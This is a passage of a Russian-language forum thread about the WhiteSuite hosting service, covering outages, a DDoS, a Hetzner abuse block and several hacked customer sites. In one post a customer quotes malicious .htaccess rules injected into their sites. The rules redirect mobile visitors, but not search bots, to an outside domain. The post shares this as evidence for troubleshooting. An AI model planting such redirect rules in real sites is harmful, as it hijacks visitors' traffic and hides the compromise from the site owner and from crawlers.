WhiteSuite: хостинг на скоростной платформе NodeSquad!

R
На сайте с 01.08.2010
Offline
40
#721

Таки да. И снова DDoS, по крайне мере биллинг и панель работают, а сайты нет, как и в прошлый раз.

Продам одну и единственную рекламную сквозную ссылку с текстом под шапкой уютного СДЛ бложика (http://u.to/-UgPBA). Возраст 3,5 года, ТИЦ=20, PR=2, dmoz: 20 wmz/мес.
bugsmoran
На сайте с 18.02.2010
Offline
223
#722
shilich1:
Опять сайты умерли, поддержка хранит молчание.

Скажите пожалуйста номер тикета. Вроде всем ответили.

rototo:
Таки да. И снова DDoS, по крайне мере биллинг и панель работают, а сайты нет, как и в прошлый раз.

На этот раз блокировка за плохой сайт. Уже разблокировали. Hetzner теперь начал моду писать непонятные абузы, а вместо обратного запроса с уточнениями, сразу блок без предупреждения.

Y
На сайте с 16.10.2011
Offline
14
yod
#723

Хочу сказать спасибо данному хостеру! Знаком с вами довольно давно, хоть сайты у меня далеко не самые нагруженные) Пару лет назад занимался блоггингом висело пару сайтов сайтов на Wordpress, потом бросил. Потом помогал человеку с сайтом на Drupal, где посещаемость была уже под 150-200 хостов, тоже, проблем с хостингом не возникало! (не из-за хостера, а просто по своим причинам бросил заниматься вебом) А сейчас вот Google Reader закрыли, так запилил себе tiny tiny rss, и снова доволен как слон. Огромное спасибо мегатерпеливой техподдержке, которая помогла настроить RSS агрегатор, (точно не скажу кто, уже забыл, но ломали над этим голову два человека), хотя это никак не связано с работой хостинга! Ещё раз огромное спасибо. Да, сайтик вначале месяца полёживал иногда, видимо из-за DDOSа, на соседа. (mryod акк на биллинге, htz1). Но, за такие то деньги мне грех чем то быть не довольным)) Всем друзьям/коллегам уже несколько лет рекомендую ваш хостинг!

K
На сайте с 15.12.2009
Offline
91
#724
bugsmoran:
Прошу прощение за длительный ответ. Что касается взлома хостинга, если его взломают, то последствия выглядят совсем по другому - они куда как фатальнее и аффектят всех пользователей. Поэтому в Вашем случае надо разбираться отдельно. Пожалуйста создайте тикет и укажите конкретные сайты. Мы посмотри какие IP заходили по SFTP и какие вообще есть аномалии. Лучше указать пометку "для Михаила", чтобы я сам посмотрел.

Аналогичная проблема, на сайтах на двух разных аккаунтах в файлы .htaccess был дописан код:

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://m.fallsky.info/?19&source=178.63.200.193 [L,R=302] # On

На других хостингах подобной проблемы не наблюдается, тикет создал.

igrinov
На сайте с 09.01.2009
Offline
134
#725
Kotjara:
На других хостингах подобной проблемы не наблюдается, тикет создал.

тоже создавал тикет, ничем помочь не смогли

одинаковый код, на разных аккаунтах на хостинге (не только на 2 о которых я писал ранее) может администрации хостинга следует провести более тщательную проверку, а то на мой тикет был дан следующий ответ

Результат: нам надо, чтобы была воспроизведена ошибка еще раз и сразу смотреть, пока логов много.
Персональный VPN/Socks сервер (https://cp.inferno.name/aff.php?aff=2419)
bugsmoran
На сайте с 18.02.2010
Offline
223
#726

Ребят, сайты заражают через их дыры в безопасности. Не через взлом сервера (CMS то поди одинаковая у вас?). Давайте просто восстановим из бэкапа и вы их обновите, чтобы закрыть баги.

Вот на вскидку посмотрел, у одного сайта версия Joomla от 27-March-2012. Ну нельзя же так.

igrinov
На сайте с 09.01.2009
Offline
134
#727
bugsmoran:
Ребят, сайты заражают через их дыры в безопасности. Не черех взлом сервера (CMS то поди одинаковая у вас?).

на одном из аккаунтов (писал в тикете) все сайты на чистом html, поэтому взлом через дыру в CMS можно сразу исключить

bugsmoran
На сайте с 18.02.2010
Offline
223
#728
igrinov:
на одном из аккаунтов (писал в тикете) все сайты на чистом html, поэтому взлом через дыру в CMS можно сразу исключить

Можете еще раз номер тикета напомнить? Я надеюсь Вы не переписали файлы обратно на нормальные? Нам надо знать даты изменения, чтобы посмотреть логи.

Если HTML, то источник проблемы ловится за минуту. Главное ничего не менять и не затереть случайно следы.

igrinov
На сайте с 09.01.2009
Offline
134
#729
bugsmoran:
Можете еще раз номер тикета напомнить?

27347

bugsmoran:
Вы не переписали файлы обратно на нормальные? Нам надо знать даты изменения, чтобы посмотреть логи.

файлы естественно переписал, но посмотрите бэкапы раньше 6 июня, там все файлы должны быть не заменены на нормальные

bugsmoran:
Если HTML, то источник проблемы ловится за минуту.

у меня html, мне помочь ничем не смогли, ответ писал выше

bugsmoran
На сайте с 18.02.2010
Offline
223
#730
igrinov:
у меня html, мне помочь ничем не смогли, ответ писал выше

В тикете 27347 Вами указан не Ваш сайт, а сайт m*****rast.ru - это WordPress, а не HTML. Вы устроили путаницу и поэтому Вам не смогли помочь :) Можете создать тикет, указав настоящий сайт?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий